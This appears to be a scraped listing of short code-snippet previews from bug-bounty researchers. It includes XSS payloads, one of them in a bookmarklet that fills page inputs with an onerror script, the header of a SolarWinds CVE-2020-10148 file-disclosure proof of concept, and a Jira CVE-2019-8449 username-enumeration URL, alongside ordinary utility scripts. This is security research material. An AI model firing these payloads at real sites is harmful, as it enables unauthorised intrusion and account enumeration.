| https://twitter.com/intigriti/status/1399317852788830211 | |
| [][`flat`][`constructor`]`alert(document.domain)``` | |
| `${e}` => [object HTMLProgressElement] | |
| `${[]/[]}` => NaN | |
| `${[][[]]}` => undefined | |
| flat | |
| constructor |
| // 1. Go to your Following page. Mine would be https://twitter.com/nytr0gen_/following | |
| // 2. Run this script in the Console. Change maxUnfollows to anything you want. | |
| // 3. Check in from time to time and run it again if it fails. | |
| sendUnfollow = () => document.querySelector('[data-testid=UserCell] [data-testid*=unfollow] span span').click(); | |
| confirmUnfollow = () => document.querySelector('[data-testid=confirmationSheetConfirm] span span').click(); | |
| sleep = ms => new Promise(r => setTimeout(r, ms)); | |
| i = 0; | |
| maxUnfollows = 1000; |
| from startpage import StartPage | |
| import sys | |
| task = StartPage() | |
| for numb,results in task.search(sys.argv[1],page=10).items(): | |
| for res in results: | |
| print(res['link']) |
| #!/bin/bash | |
| # Initiate new BBRF programs from your public and private HackerOne programs | |
| h1name="<your-hackerone-username>" | |
| apitoken="<your-hackerone-api-token>" | |
| next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100' | |
| while [ "$next" ]; do |
| using namespace System.Management.Automation | |
| using namespace System.Management.Automation.Language | |
| if ($host.Name -eq 'ConsoleHost') | |
| { | |
| Import-Module PSReadLine | |
| } | |
| #Import-Module PSColors | |
| #Import-Module posh-git | |
| Import-Module -Name Terminal-Icons |
| javascript:(function(){for (var t = document.getElementsByTagName("input"), e = 0; e < t.length; e++) "text" == t[e].getAttribute("type") && (t[e].value = '"><img src onerror=alert(document.domain)>')})();void(0) |
Read proper write-up here: https://publish.whoisbinit.me/subdomain-takeover-on-api-techprep-fb-com-through-aws-elastic-beanstalk
I have included my script in another file (main.sh), which I used in discovering this vulnerability.
I didn't do any form of manual work in finding this vulnerability, and my workflow was fully automated with Bash scripting.
I have shortened my actual script, and only included the part which helped me in finding this vulnerability in the main.sh file.
| (() => { | |
| let gadgets = []; | |
| if (typeof _satellite !== 'undefined') { | |
| gadgets.push('Adobe Dynamic Tag Management'); | |
| } | |
| if (typeof BOOMR !== 'undefined') { | |
| gadgets.push('Akamai Boomerang'); | |
| } |
| # CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? ) | |
| # @0xSha | |
| # (C) 2020 0xSha.io | |
| # Advisory : https://www.solarwinds.com/securityadvisory | |
| # Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip | |
| # Details : https://kb.cert.org/vuls/id/843464 | |
| # C:\inetpub\SolarWinds\bin\OrionWeb.DLL | |
| # According to SolarWinds.Orion.Web.HttpModules |
| cve-2019-8449 | |
| The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
| https://jira.atlassian.com/browse/JRASERVER-69796 | |
| https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
| ===================================================================================================================================== |
